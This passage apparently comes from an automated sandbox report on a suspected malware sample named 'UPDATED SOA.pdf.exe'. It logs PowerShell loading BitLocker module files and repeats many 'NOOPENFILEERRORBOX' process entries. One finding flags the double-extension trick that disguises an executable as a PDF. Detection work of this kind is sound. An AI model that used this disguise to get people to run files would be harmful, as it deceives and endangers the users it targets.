                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: UPDATED SOA.pdf.exe
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
